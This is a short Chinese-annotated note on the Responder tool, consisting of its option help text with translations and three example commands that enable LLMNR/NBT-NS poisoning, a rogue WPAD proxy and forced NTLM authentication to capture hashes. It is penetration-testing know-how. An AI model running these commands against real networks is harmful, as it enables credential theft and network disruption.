responder使用

responder使用

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests without responding.
                        分析模式。 此选项使您无需响应即可查看NBT-NS，BROWSER，LLMNR请求。
                        
  -I eth0, --interface=eth0
                        Network interface to use, you can use 'ALL' as a
                        wildcard for all interfaces
  -i 10.0.0.21, --ip=10.0.0.21
                        Local IP to use (only for OSX)
  -e 10.0.0.22, --externalip=10.0.0.22
                        Poison all requests with another IP address than
                        Responder's one.  
                        使用响应者的IP地址以外的其他IP地址处理所有请求。
                        
  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
                        返回基本HTTP身份验证。 默认值：NTLM
                        
  -r, --wredir          Enable answers for netbios wredir suffix queries.
                        Answering to wredir will likely break stuff on the
                        network. Default: False
                        为netbios wredir后缀查询启用答案。对wredir的回答可能会破坏网络上的内容。 默认值：False
                        
  -d, --NBTNSdomain     Enable answers for netbios domain suffix queries.
                        Answering to domain suffixes will likely break stuff
                        on the network. Default: False
                        为netbios域后缀查询启用答案。对域后缀的回答可能会破坏网络上的内容。 默认值：False
                        
  -f, --fingerprint     This option allows you to fingerprint a host that
                        issued an NBT-NS or LLMNR query.
                        使用此选项，您可以对发出NBT-NS或LLMNR查询的主机进行指纹识别。
                        
  -w, --wpad            Start the WPAD rogue proxy server. Default value is
                        False
  -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
                        Upstream HTTP proxy used by the rogue WPAD Proxy for
                        outgoing requests (format: host:port)
                        流氓WPAD代理用于传出请求的上游HTTP代理（格式：主机：端口）
                        
  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
                        retrieval. This may cause a login prompt. Default:
                        False
                        在wpad.dat文件检索上强制执行NTLM /基本身份验证。 这可能会导致登录提示。 默认值：False
                        
  -P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt)
                        authentication for the proxy. WPAD doesn't need to be
                        ON. This option is highly effective when combined with
                        -r. Default: False
                        强制对代理进行NTLM（透明）/基本（提示）身份验证。 WPAD不需要打开。 与-r组合使用时，此选项非常有效。 默认值：False
                        
  --lm                  Force LM hashing downgrade for Windows XP/2003 and
                        earlier. Default: False
                        为Windows XP / 2003和更早版本强制LM哈希降级。 默认值：False
                        
  -v, --verbose         Increase verbosity.
                        增加详细程度

使用

responder -I 网卡
responder -I 网卡 -wF   开启wpad，并且强制执行NTLM /基本身份验证  (实测chrome新开的时候，会触发外代net-ntlm)

responder -I eth0 -wFrv 开启wpad，并且强制执行NTLM /基本身份验证, 为netbios wredir后缀查询启用答案